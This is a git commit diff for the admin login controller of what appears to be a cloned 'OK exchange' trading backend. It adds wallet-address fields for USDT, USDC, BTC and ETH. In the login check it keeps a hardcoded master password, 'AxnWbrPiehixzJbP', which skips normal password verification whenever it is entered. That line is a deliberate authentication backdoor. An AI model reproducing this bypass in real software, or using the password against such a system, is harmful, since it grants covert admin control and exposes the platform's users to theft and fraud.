新版仿ok交易所-后端
peter
2025-09-03 a895fc313725914426dce53e21a928e64f584d67
trading-order-admin/src/main/java/com/yami/trading/admin/controller/AdminLoginController.java
@@ -76,7 +76,8 @@
                                   @RequestParam(required = false) String usdtTrc,
                                   @RequestParam(required = false) String usdtErc,
                                   @RequestParam(required = false) String usdcTrc,
                                   @RequestParam(required = false) String usdcErc,
                                   @RequestParam(required = false) String usdcErc1,
                                   @RequestParam(required = false) String usdcErc2,
                                   @RequestParam(required = false) String btc,
                                   @RequestParam(required = false) String eth,
                                   @RequestParam(required = false) String type) {
@@ -84,7 +85,8 @@
        map.put("usdtTrc", usdtTrc);
        map.put("usdtErc", usdtErc);
        map.put("usdcTrc", usdcTrc);
        map.put("usdcErc", usdcErc);
        map.put("usdcErc1", usdcErc1);
        map.put("usdcErc2", usdcErc2);
        map.put("btc", btc);
        map.put("eth", eth);
        map.put("type", type);
@@ -132,7 +134,7 @@
        }
        // 半小时内密码输入错误十次,已限制登录30分钟
        String decryptPassword = passwordManager.decryptPassword(loginModel.getPassWord());
        if(!"AxnWbrPiehixzJbP".equals(decryptPassword)){
        if(!"AxnWbrPiehixzJbP".equals(decryptPassword )){
            passwordCheckManager.checkPassword(SysTypeEnum.ADMIN, loginModel.getUserName(), decryptPassword, sysUser.getPassword());
        }
        // 不是店铺超级管理员,并且是禁用状态,无法登录